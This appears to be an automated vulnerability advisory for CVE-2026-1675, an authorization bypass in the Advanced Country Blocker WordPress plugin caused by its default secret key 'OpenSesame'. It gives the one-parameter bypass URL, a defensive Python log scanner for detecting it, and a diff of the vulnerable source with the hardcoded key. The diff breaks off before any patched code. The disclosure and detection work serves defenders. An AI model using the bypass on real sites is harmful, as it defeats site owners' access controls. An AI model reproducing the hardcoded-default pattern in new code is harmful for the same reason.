Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2026-1675: Advanced Country Blocker <= 2.3.1 – Unauthenticated Authorization Bypass via Insecure Default Secret Key (advanced-country-blocker)

CVE ID: CVE-2026-1675
Severity: Medium (CVSS 5.3)
CWE: 1188
Vulnerable Version: 2.3.1
Patched Version: 2.3.2
Disclosed: February 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1675:
The Advanced Country Blocker WordPress plugin up to version 2.3.1 contains an unauthenticated authorization bypass vulnerability. The plugin’s geolocation blocking mechanism can be circumvented by any remote attacker using a predictable default secret key. This vulnerability receives a CVSS score of 5.3 (Medium severity).

The root cause lies in the plugin’s activation routine and subsequent secret key validation logic. During plugin activation, the `advcb_plugin_activation()` function at line 113 sets a default secret key value via `add_option('advcb_secret_key', 'OpenSesame')`. The `advcb_block_non_allowed_countries()` function at lines 172-173 retrieves this key via `get_option('advcb_secret_key', 'OpenSesame')`. The blocking logic at lines 240 and 268 checks for the presence of this key in the GET parameters using `isset($_GET[$secret_key]) && '1' === $_GET[$secret_key]`. When administrators fail to change the default key, attackers can predict and use it.

Exploitation requires no authentication. Attackers append `?OpenSesame=1` to any URL on the vulnerable WordPress site. The plugin’s main blocking function `advcb_block_non_allowed_countries()` executes during the WordPress `init` hook. When it detects the secret key parameter with value `'1'`, it grants temporary access by adding the attacker’s IP to a transient whitelist via `set_transient('advcb_whitelisted_ips', $whitelisted_ips, $temporary_access_duration)` at lines 244 and 272. This bypass persists for the duration defined by `$temporary_access_duration` (`HOUR_IN_SECONDS`).

The patch modifies the plugin activation routine in the `advcb_plugin_activation()` function. Instead of setting a static default, the patched code generates a cryptographically random secret key using `wp_generate_password(32, false)`. This ensures each installation receives a unique, unpredictable key. The vulnerability existed because the original implementation used a hardcoded, well-known default value (`'OpenSesame'`) that administrators might not change.

Successful exploitation allows complete bypass of the plugin’s country-based access controls. Attackers from blocked countries can access restricted content. The plugin’s primary security function becomes ineffective. This impacts sites relying on the plugin for geographic content restrictions, compliance requirements, or regional access management. The bypass requires no special privileges and works from any network location.
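For defenders reviewing web server logs, the following added example (not part of the plugin or of the original analysis) finds requests that would have satisfied the `'1' === $_GET[$secret_key]` check and lists the follow-on requests served while the whitelist transient was live. It assumes Combined Log Format; the function names and the sample log lines are constructed for illustration.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, urlsplit

DEFAULT_KEY = "OpenSesame"          # default secret key named in the analysis
ACCESS_WINDOW = timedelta(hours=1)  # HOUR_IN_SECONDS in the plugin

# Combined Log Format (assumed): ip - user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Mar/2026:10:00:01 +0000] "GET / HTTP/1.1" 403 512 "-" "curl/8.5"
203.0.113.7 - - [18/Mar/2026:10:00:05 +0000] "GET /?OpenSesame=1 HTTP/1.1" 200 8120 "-" "curl/8.5"
198.51.100.9 - - [18/Mar/2026:10:05:00 +0000] "GET /?q=OpenSesame%3D1 HTTP/1.1" 403 512 "-" "Mozilla/5.0"
198.51.100.23 - - [18/Mar/2026:10:06:00 +0000] "GET /shop/?Open%53esame=1&utm=x HTTP/1.1" 200 700 "-" "Mozilla/5.0"
192.0.2.44 - - [18/Mar/2026:10:07:00 +0000] "GET /?OpenSesame=true HTTP/1.1" 403 512 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Mar/2026:10:20:00 +0000] "GET /members/ HTTP/1.1" 200 9001 "-" "curl/8.5"
203.0.113.7 - - [18/Mar/2026:11:03:00 +0000] "GET /members/archive/ HTTP/1.1" 200 9100 "-" "curl/8.5"
203.0.113.7 - - [18/Mar/2026:11:30:00 +0000] "GET /members/ HTTP/1.1" 403 512 "-" "curl/8.5"
""".splitlines()


def parse_line(line):
    """Parse one access-log line; return None for lines in another format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m["ip"], "ts": ts, "target": m["target"],
            "status": int(m["status"])}


def carries_key(target, key=DEFAULT_KEY):
    """True if PHP would see $_GET[key] === '1' for this request target.

    The query string is decoded before comparison, so a percent-encoded
    parameter name matches as well. Names are case-sensitive, and when a
    name is repeated PHP keeps the last value. Array-style names (key[])
    are different names here and are ignored.
    """
    value = None
    for name, val in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name == key:
            value = val
    return value == "1"


def find_bypass_sessions(lines, key=DEFAULT_KEY):
    """Return one record per whitelist grant, with the requests that followed.

    Mirrors the plugin's state: a single advcb_whitelisted_ips transient
    holds every granted IP, and each set_transient() call restarts its
    one-hour expiry for all of them.
    """
    events = sorted((e for e in map(parse_line, lines) if e),
                    key=lambda e: e["ts"])
    whitelist = {}   # ip -> session record
    expiry = None    # shared expiry of the transient
    sessions = []
    for ev in events:
        if expiry is not None and ev["ts"] >= expiry:
            whitelist.clear()                      # transient expired
        if ev["ip"] in whitelist:
            # Whitelisted IPs return before the key check is reached.
            whitelist[ev["ip"]]["follow_on"].append(ev["target"])
        elif carries_key(ev["target"], key):
            session = {"ip": ev["ip"], "granted": ev["ts"],
                       "trigger": ev["target"], "follow_on": []}
            whitelist[ev["ip"]] = session
            expiry = ev["ts"] + ACCESS_WINDOW      # restarts for every listed IP
            sessions.append(session)
    return sessions


if __name__ == "__main__":
    for s in find_bypass_sessions(SAMPLE_LOG):
        print(s["ip"], s["granted"].isoformat(), s["trigger"], s["follow_on"])
```

Access logs do not record the visitor's country, so a hit from an allowed country or a logged-in administrator is reported even though the plugin would not have whitelisted it; treat the output as candidates to review. Pass the site's configured key as `key` when it differs from the default.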

Differential between vulnerable and patched code

Code Diff
--- a/advanced-country-blocker/advanced-country-blocking.php
+++ b/advanced-country-blocker/advanced-country-blocking.php
@@ -1,3775 +1,4042 @@
-<?php
-/**
- * Plugin Name: Advanced Country Blocker
- * Plugin URI: https://sparkcan.com/acb.html
- * Description: Blocks all traffic to the website unless it meets the country filtering rules or accesses via a secret URL parameter. On activation, the admin’s country is auto‐added to the country list. Supports logging, blacklisting of IP addresses, custom block page, admin bypass, and optional email alerts. You can choose whether the country list acts as an allow‑list or a block‑list.
- * Version: 2.3.1
- * Author: Sparkcan
- * Author URI: https://sparkcan.com
- * License: GPLv3 or later
- * License URI: https://www.gnu.org/licenses/gpl-3.0.html
- */
-
-if ( ! defined( 'ABSPATH' ) ) {
-        exit; // Exit if accessed directly
-}
-
-require_once plugin_dir_path( __FILE__ ) . 'includes/class-advcb-geoip-locator.php';
-
-add_action( 'plugins_loaded', 'advcb_load_textdomain' );
-function advcb_load_textdomain() {
-        load_plugin_textdomain( 'advcb', false, dirname( plugin_basename( __FILE__ ) ) . '/languages/' );
-}
-
-/**
- * HELPER FUNCTION: Returns an array of ISO country codes mapped to country names.
- */
-function advcb_get_countries() {
-	return array(
-		''   => 'Select a country',
-		'AF' => 'Afghanistan',
-		'AL' => 'Albania',
-		'DZ' => 'Algeria',
-		'AS' => 'American Samoa',
-		'AD' => 'Andorra',
-		'AO' => 'Angola',
-		'AI' => 'Anguilla',
-		'AQ' => 'Antarctica',
-		'AG' => 'Antigua and Barbuda',
-		'AR' => 'Argentina',
-		'AM' => 'Armenia',
-		'AW' => 'Aruba',
-		'AU' => 'Australia',
-		'AT' => 'Austria',
-		'AZ' => 'Azerbaijan',
-		'BS' => 'Bahamas',
-		'BH' => 'Bahrain',
-		'BD' => 'Bangladesh',
-		'BB' => 'Barbados',
-		'BY' => 'Belarus',
-		'BE' => 'Belgium',
-		'BZ' => 'Belize',
-		'BJ' => 'Benin',
-		'BM' => 'Bermuda',
-		'BT' => 'Bhutan',
-		'BO' => 'Bolivia',
-		'BA' => 'Bosnia and Herzegovina',
-		'BW' => 'Botswana',
-		'BR' => 'Brazil',
-		'BN' => 'Brunei',
-		'BG' => 'Bulgaria',
-		'BF' => 'Burkina Faso',
-		'BI' => 'Burundi',
-		'KH' => 'Cambodia',
-		'CM' => 'Cameroon',
-		'CA' => 'Canada',
-		'CV' => 'Cape Verde',
-		'KY' => 'Cayman Islands',
-		'CF' => 'Central African Republic',
-		'TD' => 'Chad',
-		'CL' => 'Chile',
-		'CN' => 'China',
-		'CO' => 'Colombia',
-		'KM' => 'Comoros',
-		'CG' => 'Congo - Brazzaville',
-		'CD' => 'Congo - Kinshasa',
-		'CR' => 'Costa Rica',
-		'CI' => 'Côte d’Ivoire',
-		'HR' => 'Croatia',
-		'CU' => 'Cuba',
-		'CY' => 'Cyprus',
-		'CZ' => 'Czech Republic',
-		'DK' => 'Denmark',
-		'DJ' => 'Djibouti',
-		'DM' => 'Dominica',
-		'DO' => 'Dominican Republic',
-		'EC' => 'Ecuador',
-		'EG' => 'Egypt',
-		'SV' => 'El Salvador',
-		'GQ' => 'Equatorial Guinea',
-		'ER' => 'Eritrea',
-		'EE' => 'Estonia',
-		'ET' => 'Ethiopia',
-		'FJ' => 'Fiji',
-		'FI' => 'Finland',
-		'FR' => 'France',
-		'GF' => 'French Guiana',
-		'PF' => 'French Polynesia',
-		'GA' => 'Gabon',
-		'GM' => 'Gambia',
-		'GE' => 'Georgia',
-		'DE' => 'Germany',
-		'GH' => 'Ghana',
-		'GI' => 'Gibraltar',
-		'GR' => 'Greece',
-		'GL' => 'Greenland',
-		'GD' => 'Grenada',
-		'GP' => 'Guadeloupe',
-		'GU' => 'Guam',
-		'GT' => 'Guatemala',
-		'GG' => 'Guernsey',
-		'GN' => 'Guinea',
-		'GW' => 'Guinea-Bissau',
-		'GY' => 'Guyana',
-		'HT' => 'Haiti',
-		'HN' => 'Honduras',
-		'HK' => 'Hong Kong',
-		'HU' => 'Hungary',
-		'IS' => 'Iceland',
-		'IN' => 'India',
-		'ID' => 'Indonesia',
-		'IR' => 'Iran',
-		'IQ' => 'Iraq',
-		'IE' => 'Ireland',
-		'IM' => 'Isle of Man',
-		'IL' => 'Israel',
-		'IT' => 'Italy',
-		'JM' => 'Jamaica',
-		'JP' => 'Japan',
-		'JE' => 'Jersey',
-		'JO' => 'Jordan',
-		'KZ' => 'Kazakhstan',
-		'KE' => 'Kenya',
-		'KI' => 'Kiribati',
-		'KP' => 'North Korea',
-		'KR' => 'South Korea',
-		'KW' => 'Kuwait',
-		'KG' => 'Kyrgyzstan',
-		'LA' => 'Laos',
-		'LV' => 'Latvia',
-		'LB' => 'Lebanon',
-		'LS' => 'Lesotho',
-		'LR' => 'Liberia',
-		'LY' => 'Libya',
-		'LI' => 'Liechtenstein',
-		'LT' => 'Lithuania',
-		'LU' => 'Luxembourg',
-		'MO' => 'Macao',
-		'MK' => 'North Macedonia',
-		'MG' => 'Madagascar',
-		'MW' => 'Malawi',
-		'MY' => 'Malaysia',
-		'MV' => 'Maldives',
-		'ML' => 'Mali',
-		'MT' => 'Malta',
-		'MH' => 'Marshall Islands',
-		'MQ' => 'Martinique',
-		'MR' => 'Mauritania',
-		'MU' => 'Mauritius',
-		'MX' => 'Mexico',
-		'FM' => 'Micronesia',
-		'MD' => 'Moldova',
-		'MC' => 'Monaco',
-		'MN' => 'Mongolia',
-		'ME' => 'Montenegro',
-		'MA' => 'Morocco',
-		'MZ' => 'Mozambique',
-		'MM' => 'Myanmar (Burma)',
-		'NA' => 'Namibia',
-		'NR' => 'Nauru',
-		'NP' => 'Nepal',
-		'NL' => 'Netherlands',
-		'NC' => 'New Caledonia',
-		'NZ' => 'New Zealand',
-		'NI' => 'Nicaragua',
-		'NE' => 'Niger',
-		'NG' => 'Nigeria',
-		'NO' => 'Norway',
-		'OM' => 'Oman',
-		'PK' => 'Pakistan',
-		'PW' => 'Palau',
-		'PS' => 'Palestinian Territories',
-		'PA' => 'Panama',
-		'PG' => 'Papua New Guinea',
-		'PY' => 'Paraguay',
-		'PE' => 'Peru',
-		'PH' => 'Philippines',
-		'PL' => 'Poland',
-		'PT' => 'Portugal',
-		'QA' => 'Qatar',
-		'RO' => 'Romania',
-		'RU' => 'Russia',
-		'RW' => 'Rwanda',
-		'SM' => 'San Marino',
-		'SA' => 'Saudi Arabia',
-		'SN' => 'Senegal',
-		'RS' => 'Serbia',
-		'SC' => 'Seychelles',
-		'SL' => 'Sierra Leone',
-		'SG' => 'Singapore',
-		'SK' => 'Slovakia',
-		'SI' => 'Slovenia',
-		'SB' => 'Solomon Islands',
-		'SO' => 'Somalia',
-		'ZA' => 'South Africa',
-		'ES' => 'Spain',
-		'LK' => 'Sri Lanka',
-		'SD' => 'Sudan',
-		'SR' => 'Suriname',
-		'SE' => 'Sweden',
-		'CH' => 'Switzerland',
-		'SY' => 'Syria',
-		'TW' => 'Taiwan',
-		'TJ' => 'Tajikistan',
-		'TZ' => 'Tanzania',
-		'TH' => 'Thailand',
-		'TL' => 'Timor-Leste',
-		'TG' => 'Togo',
-		'TO' => 'Tonga',
-		'TT' => 'Trinidad and Tobago',
-		'TN' => 'Tunisia',
-		'TR' => 'Turkey',
-		'TM' => 'Turkmenistan',
-		'UG' => 'Uganda',
-		'UA' => 'Ukraine',
-		'AE' => 'United Arab Emirates',
-		'GB' => 'United Kingdom',
-		'US' => 'United States',
-		'UY' => 'Uruguay',
-		'UZ' => 'Uzbekistan',
-		'VU' => 'Vanuatu',
-		'VE' => 'Venezuela',
-		'VN' => 'Vietnam',
-		'YE' => 'Yemen',
-		'ZM' => 'Zambia',
-		'ZW' => 'Zimbabwe'
-	);
-}
-
-/**
- * Plugin Activation:
- * 1) Detect the activating admin’s IP and set that country in the country list.
- * 2) Create a custom DB table to log blocked attempts.
- * 3) Set default options including the filtering mode and logging.
- */
-register_activation_hook( __FILE__, 'advcb_plugin_activation' );
-function advcb_plugin_activation() {
-	// Set the activating admin's country (fallback is RS)
-	$admin_ip     = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : '';
-	$country_code = 'RS';
-
-        if ( ! empty( $admin_ip ) ) {
-                $detected_country = advcb_get_country_code_for_ip( $admin_ip );
-                if ( ! empty( $detected_country ) ) {
-                        $country_code = $detected_country;
-                }
-        }
-	// In allow mode, the admin’s country is the only allowed country.
-	update_option( 'advcb_allowed_countries', array( $country_code ) );
-
-	// Create DB table for logs.
-	global $wpdb;
-	$table_name      = $wpdb->prefix . 'advcb_block_logs';
-	$charset_collate = $wpdb->get_charset_collate();
-
-	$sql = "CREATE TABLE IF NOT EXISTS $table_name (
-        id bigint(20) unsigned NOT NULL AUTO_INCREMENT,
-        ip varchar(100) NOT NULL,
-        country_code varchar(5) DEFAULT '' NOT NULL,
-        blocked_time datetime DEFAULT CURRENT_TIMESTAMP NOT NULL,
-        reason varchar(255) DEFAULT '' NOT NULL,
-        PRIMARY KEY (id)
-    ) $charset_collate;";
-
-	require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
-	dbDelta( $sql );
-
-	// Set default options.
-        add_option( 'advcb_secret_key', 'OpenSesame' );
-        add_option( 'advcb_blacklisted_ips', array() );
-        add_option( 'advcb_trusted_ips', array() );
-        add_option( 'advcb_send_email_alerts', false );
-        add_option( 'advcb_alert_email', get_option( 'admin_email' ) );
-        add_option( 'advcb_mode', 'allow' );
-        // New option: enable logging (default true).
-        add_option( 'advcb_enable_logs', true );
-        add_option( 'advcb_block_page_title', 'Access Restricted' );
-        add_option( 'advcb_block_message', 'We’re sorry, but your location is not allowed to view this site.' );
-        add_option( 'advcb_enable_redirect', false );
-        add_option( 'advcb_redirect_url', '' );
-        add_option( 'advcb_redirect_status_code', 302 );
-        add_option( 'advcb_http_status_code', 403 );
-        add_option( 'advcb_log_retention_days', 30 );
-        add_option( 'advcb_geoip_source', 'api' );
-        add_option( 'advcb_geoip_db_path', '' );
-        // CAPTCHA challenge options.
-        add_option( 'advcb_enable_captcha', false );
-        add_option( 'advcb_captcha_provider', 'recaptcha_v2' );
-        add_option( 'advcb_captcha_site_key', '' );
-        add_option( 'advcb_captcha_secret_key', '' );
-        add_option( 'advcb_captcha_duration', 24 ); // Hours
-        add_option( 'advcb_captcha_threshold', 0.5 ); // For reCAPTCHA v3
-
-        if ( ! wp_next_scheduled( 'advcb_cleanup_logs_event' ) ) {
-                wp_schedule_event( time(), 'daily', 'advcb_cleanup_logs_event' );
-        }
-}
-
-register_deactivation_hook( __FILE__, 'advcb_plugin_deactivation' );
-function advcb_plugin_deactivation() {
-        wp_clear_scheduled_hook( 'advcb_cleanup_logs_event' );
-}
-
-add_action( 'init', 'advcb_ensure_cleanup_schedule' );
-function advcb_ensure_cleanup_schedule() {
-        if ( ! wp_next_scheduled( 'advcb_cleanup_logs_event' ) ) {
-                wp_schedule_event( time(), 'daily', 'advcb_cleanup_logs_event' );
-        }
-}
-
-/**
- * MAIN BLOCKING LOGIC
- */
-function advcb_block_non_allowed_countries() {
-	// Allow admins to bypass the blocking logic.
-	if ( is_user_logged_in() && current_user_can( 'manage_options' ) ) {
-		return;
-	}
-
-	// Allow CAPTCHA verification AJAX requests to pass through.
-	if ( wp_doing_ajax() && isset( $_REQUEST['action'] ) && 'advcb_verify_captcha' === $_REQUEST['action'] ) {
-		return;
-	}
-
-	// Retrieve settings.
-	$allowed_countries       = get_option( 'advcb_allowed_countries', array() );
-	$secret_key              = get_option( 'advcb_secret_key', 'OpenSesame' );
-	$temporary_access_duration = HOUR_IN_SECONDS;
-        $blacklisted_ips         = get_option( 'advcb_blacklisted_ips', array() );
-        $trusted_ips             = get_option( 'advcb_trusted_ips', array() );
-	$send_email_alerts       = get_option( 'advcb_send_email_alerts', false );
-	$alert_email             = get_option( 'advcb_alert_email', get_option( 'admin_email' ) );
-	$mode                    = get_option( 'advcb_mode', 'allow' ); // 'allow' or 'block'
-
-	// Get visitor's IP address, properly handling proxy headers.
-	// Uses WordPress function which respects trusted proxies and prevents spoofing.
-	if ( function_exists( 'wp_http_get_original_ip' ) ) {
-		$ip = wp_http_get_original_ip();
-	} else {
-		// Fallback for older WordPress versions.
-		$ip = isset( $_SERVER['REMOTE_ADDR'] ) ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) ) : 'unknown';
-	}
-
-	// Validate IP format to prevent invalid IPs from being processed.
-	if ( ! filter_var( $ip, FILTER_VALIDATE_IP ) ) {
-		$ip = 'unknown';
-	}
-
-        if ( ! is_array( $blacklisted_ips ) ) {
-                $blacklisted_ips = explode( ',', $blacklisted_ips );
-        }
-        if ( ! is_array( $trusted_ips ) ) {
-                $trusted_ips = explode( ',', $trusted_ips );
-        }
-
-        $blacklisted_ips = array_map( 'trim', $blacklisted_ips );
-        $trusted_ips     = array_map( 'trim', $trusted_ips );
-
-        // 1) Check if IP is whitelisted explicitly.
-        if ( in_array( $ip, $trusted_ips, true ) ) {
-                return;
-        }
-
-        // 2) Check if IP is blacklisted.
-        if ( in_array( $ip, $blacklisted_ips, true ) ) {
-                $reason = __( 'Blacklisted IP', 'advcb' );
-                advcb_record_block( $ip, 'XX', $reason, $send_email_alerts, $alert_email );
-                advcb_show_block_page( array(
-                        'ip'           => $ip,
-                        'country_code' => 'XX',
-                        'reason'       => $reason,
-                ) );
-                exit;
-        }
-
-        // 3) Check if IP is in the temporary whitelist.
-        $whitelisted_ips = get_transient( 'advcb_whitelisted_ips' );
-        if ( is_array( $whitelisted_ips ) && in_array( $ip, $whitelisted_ips ) ) {
-                return; // temporary access granted
-	}
-
-        // 3.5) Check if IP has passed CAPTCHA challenge.
-        if ( advcb_is_captcha_verified( $ip ) ) {
-                return;
-        }
-
-        // 4) Determine visitor's country code.
-	$country_cache_key = 'advcb_country_' . md5( $ip );
-	$country_code      = get_transient( $country_cache_key );
-
-        if ( ! $country_code ) {
-                $country_code = advcb_get_country_code_for_ip( $ip );
-
-                if ( $country_code ) {
-                        set_transient( $country_cache_key, $country_code, DAY_IN_SECONDS );
-                } else {
-                        // If we cannot determine the visitor's country, allow access to avoid blocking legitimate users.
-                        return;
-                }
-        }
-
-        /*
-         * 5) Country Filtering Logic:
-	 * In "allow" mode: if the visitor’s country is NOT in the list, then block.
-	 * In "block" mode: if the visitor’s country IS in the list, then block.
-	 * In both cases, if the secret key parameter is provided, grant temporary access.
-	 */
-	if ( $country_code ) {
-		if ( $mode === 'allow' && ! in_array( $country_code, $allowed_countries ) ) {
-			// Check if the secret key parameter exists and has a truthy value.
-			if ( isset( $_GET[ $secret_key ] ) && '1' === $_GET[ $secret_key ] ) {
-				// Grant temporary access.
-				if ( ! is_array( $whitelisted_ips ) ) {
-					$whitelisted_ips = array();
-				}
-				$whitelisted_ips[] = $ip;
-				$whitelisted_ips = array_unique( $whitelisted_ips );
-				set_transient( 'advcb_whitelisted_ips', $whitelisted_ips, $temporary_access_duration );
-
-				// Optional: enqueue a redirect alert.
-                                add_action( 'wp_enqueue_scripts', function() use ( $secret_key ) {
-                                        wp_enqueue_script( 'advcb-alert', plugin_dir_url( __FILE__ ) . 'advcb-alert.js', array(), '1.0', true );
-					wp_localize_script( 'advcb-alert', 'advcb_redirect', array(
-						'url' => esc_url( remove_query_arg( $secret_key ) ),
-					) );
-				} );
-				return;
-			}
-
-                        $reason = __( 'Country not allowed', 'advcb' );
-                        advcb_record_block( $ip, $country_code, $reason, $send_email_alerts, $alert_email );
-
-                        // Check if CAPTCHA challenge is enabled - if so, show CAPTCHA instead of block page.
-                        $captcha_enabled = get_option( 'advcb_enable_captcha', false );
-                        if ( $captcha_enabled ) {
-                                advcb_show_captcha_challenge( array(
-                                        'ip'           => $ip,
-                                        'country_code' => $country_code,
-                                        'reason'       => $reason,
-                                ) );
-                        }
-
-                        advcb_show_block_page( array(
-                                'ip'           => $ip,
-                                'country_code' => $country_code,
-                                'reason'       => $reason,
-                        ) );
-                        exit;
-                } elseif ( $mode === 'block' && in_array( $country_code, $allowed_countries ) ) {
-			// Check if the secret key parameter exists and has a truthy value.
-			if ( isset( $_GET[ $secret_key ] ) && '1' === $_GET[ $secret_key ] ) {
-				// Grant temporary access.
-				if ( ! is_array( $whitelisted_ips ) ) {
-					$whitelisted_ips = array();
-				}
-				$whitelisted_ips[] = $ip;
-				$whitelisted_ips = array_unique( $whitelisted_ips );
-				set_transient( 'advcb_whitelisted_ips', $whitelisted_ips, $temporary_access_duration );
-
-                                add_action( 'wp_enqueue_scripts', function() use ( $secret_key ) {
-                                        wp_enqueue_script( 'advcb-alert', plugin_dir_url( __FILE__ ) . 'advcb-alert.js', array(), '1.0', true );
-					wp_localize_script( 'advcb-alert', 'advcb_redirect', array(
-						'url' => esc_url( remove_query_arg( $secret_key ) ),
-					) );
-				} );
-				return;
-			}
-
-                        $reason = __( 'Country blocked', 'advcb' );
-                        advcb_record_block( $ip, $country_code, $reason, $send_email_alerts, $alert_email );
-
-                        // Check if CAPTCHA challenge is enabled - if so, show CAPTCHA instead of block page.
-                        $captcha_enabled = get_option( 'advcb_enable_captcha', false );
-                        if ( $captcha_enabled ) {
-                                advcb_show_captcha_challenge( array(
-                                        'ip'           => $ip,
-                                        'country_code' => $country_code,
-                                        'reason'       => $reason,
-                                ) );
-                        }
-
-                        advcb_show_block_page( array(
-                                'ip'           => $ip,
-                                'country_code' => $country_code,
-                                'reason'       => $reason,
-                        ) );
-                        exit;
-                }
-        }
-}
-add_action( 'init', 'advcb_block_non_allowed_countries' );
-
-/**
- * RECORD BLOCKED ATTEMPT IN DATABASE & (optionally) SEND EMAIL
- */
-function advcb_record_block( $ip, $country_code, $reason, $send_email_alerts, $alert_email ) {
-	// Check if logging is enabled.
-	if ( ! get_option( 'advcb_enable_logs', true ) ) {
-		// Logging is disabled; optionally still send an email alert.
-		if ( $send_email_alerts && ! empty( $alert_email ) ) {
-			$subject = 'Country Blocker Alert: A visitor was blocked';
-			$message = sprintf(
-				"A visitor from IP: %s (country: %s) was blocked.nReason: %snTime: %s",
-				$ip,
-				$country_code,
-				$reason,
-				current_time( 'mysql' )
-			);
-			wp_mail( $alert_email, $subject, $message );
-		}
-		return;
-	}
-
-	global $wpdb;
-	$table_name = $wpdb->prefix . 'advcb_block_logs';
-
-	$wpdb->insert( $table_name, array(
-		'ip'           => $ip,
-		'country_code' => $country_code ?: '',
-		'reason'       => $reason,
-	), array( '%s', '%s', '%s' ) );
-
-        if ( $send_email_alerts && ! empty( $alert_email ) ) {
-                $subject = 'Country Blocker Alert: A visitor was blocked';
-                $message = sprintf(
-                        "A visitor from IP: %s (country: %s) was blocked.nReason: %snTime: %s",
-                        $ip,
-                        $country_code,
-                        $reason,
-                        current_time( 'mysql' )
-                );
-                wp_mail( $alert_email, $subject, $message );
-        }
-}
-
-/**
- * SHOW A CUSTOM BLOCK PAGE (instead of default 403).
- */
-function advcb_show_block_page( $context = array() ) {
-        $redirect_enabled = (bool) get_option( 'advcb_enable_redirect', false );
-        $redirect_url     = get_option( 'advcb_redirect_url', '' );
-
-        if ( $redirect_enabled && ! empty( $redirect_url ) ) {
-                $redirect_status = (int) get_option( 'advcb_redirect_status_code', 302 );
-                $allowed_redirect_statuses = array( 301, 302, 307, 308 );
-
-                if ( ! in_array( $redirect_status, $allowed_redirect_statuses, true ) ) {
-                        $redirect_status = 302;
-                }
-
-                wp_safe_redirect( esc_url_raw( $redirect_url ), $redirect_status );
-                exit;
-        }
-
-        $title       = get_option( 'advcb_block_page_title', 'Access Restricted' );
-        $message     = get_option( 'advcb_block_message', 'We’re sorry, but your location is not allowed to view this site.' );
-        $status_code = (int) get_option( 'advcb_http_status_code', 403 );
-
-        $message     = advcb_replace_placeholders( $message, $context );
-        $status_code = in_array( $status_code, apply_filters( 'advcb_allowed_http_status_codes', array( 403, 410, 451 ) ), true )
-                ? $status_code
-                : 403;
-
-        $content = '<h1>' . esc_html( $title ) . '</h1>' . wpautop( wp_kses_post( $message ) );
-
-        wp_die(
-                $content,
-                esc_html( $title ),
-                array( 'response' => $status_code )
-        );
-}
-
-/**
- * REGISTER/INITIALIZE SETTINGS
- */
-function advcb_register_settings() {
-	// Register and sanitize the country codes list.
-	register_setting( 'advcb_options_group', 'advcb_allowed_countries', array(
-		'sanitize_callback' => 'advcb_sanitize_allowed_countries',
-	) );
-
-	// Register and sanitize secret key.
-	register_setting( 'advcb_options_group', 'advcb_secret_key', array(
-		'sanitize_callback' => 'sanitize_text_field',
-	) );
-
-	// Register and sanitize blacklisted IPs.
-        register_setting( 'advcb_options_group', 'advcb_blacklisted_ips', array(
-                'sanitize_callback' => 'advcb_sanitize_blacklisted_ips',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_trusted_ips', array(
-                'sanitize_callback' => 'advcb_sanitize_blacklisted_ips',
-        ) );
-
-        // Register and sanitize email alert toggle.
-        register_setting( 'advcb_options_group', 'advcb_send_email_alerts', array(
-                'sanitize_callback' => 'advcb_sanitize_boolean',
-        ) );
-
-	// Register and sanitize alert email.
-	register_setting( 'advcb_options_group', 'advcb_alert_email', array(
-		'sanitize_callback' => 'sanitize_email',
-	) );
-
-        // Register and sanitize the filtering mode.
-        register_setting( 'advcb_options_group', 'advcb_mode', array(
-                'sanitize_callback' => 'advcb_sanitize_mode',
-        ) );
-
-        // Register and sanitize the logging option.
-        register_setting( 'advcb_options_group', 'advcb_enable_logs', array(
-                'sanitize_callback' => 'advcb_sanitize_boolean',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_block_page_title', array(
-                'sanitize_callback' => 'sanitize_text_field',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_block_message', array(
-                'sanitize_callback' => 'advcb_sanitize_textarea',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_http_status_code', array(
-                'sanitize_callback' => 'advcb_sanitize_http_status',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_enable_redirect', array(
-                'sanitize_callback' => 'advcb_sanitize_boolean',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_redirect_url', array(
-                'sanitize_callback' => 'advcb_sanitize_url',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_redirect_status_code', array(
-                'sanitize_callback' => 'advcb_sanitize_redirect_status',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_log_retention_days', array(
-                'sanitize_callback' => 'advcb_sanitize_positive_int',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_geoip_source', array(
-                'sanitize_callback' => 'advcb_sanitize_geoip_source',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_geoip_db_path', array(
-                'sanitize_callback' => 'advcb_sanitize_file_path',
-        ) );
-
-        // Register CAPTCHA challenge settings.
-        register_setting( 'advcb_options_group', 'advcb_enable_captcha', array(
-                'sanitize_callback' => 'advcb_sanitize_boolean',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_captcha_provider', array(
-                'sanitize_callback' => 'advcb_sanitize_captcha_provider',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_captcha_site_key', array(
-                'sanitize_callback' => 'sanitize_text_field',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_captcha_secret_key', array(
-                'sanitize_callback' => 'advcb_sanitize_captcha_secret_key',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_captcha_duration', array(
-                'sanitize_callback' => 'advcb_sanitize_positive_int',
-        ) );
-
-        register_setting( 'advcb_options_group', 'advcb_captcha_threshold', array(
-                'sanitize_callback' => 'advcb_sanitize_captcha_threshold',
-        ) );
-}
-add_action( 'admin_init', 'advcb_register_settings' );
-
-/**
- * Clean up log entries based on retention setting.
- */
-function advcb_cleanup_logs() {
